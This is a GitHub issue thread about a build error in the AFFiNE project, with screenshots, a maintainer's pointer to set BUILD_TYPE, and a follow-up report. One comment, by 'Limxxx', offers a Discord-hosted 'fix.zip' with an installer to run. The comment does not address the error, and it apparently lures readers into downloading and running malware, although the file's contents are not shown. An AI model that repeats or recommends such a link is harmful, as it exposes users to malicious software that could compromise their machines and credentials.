### ISSUE TITLE
​build error

### ISSUE THREAD

**Issue by mxy2316868975javascript** [toeverything/AFFiNE#8075]
### What happened?

<img width="905" alt="image" src="https://github.com/user-attachments/assets/63e93d42-98f2-4d63-a0fe-d30dd3f3fa74">

### Distribution version

macOS x64 (Intel)

### Are you self-hosting?

- [ ] Yes

### Anything else?

<img width="905" alt="image" src="https://github.com/user-attachments/assets/a20eec47-f80f-42e5-a347-32e544d19b31">

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by forehalo** [comment]
the error shows the reason. set a `BUILD_TYPE`

**Comment by mxy2316868975javascript** [comment]
Debug blocksuite locally error
<img width="505" alt="image" src="https://github.com/user-attachments/assets/cbef02c3-b7ec-464e-97a6-e7b485c6bf59">
<img width="865" alt="image" src="https://github.com/user-attachments/assets/e02474b8-d8dc-4fe3-9089-4bd2ebec9331">
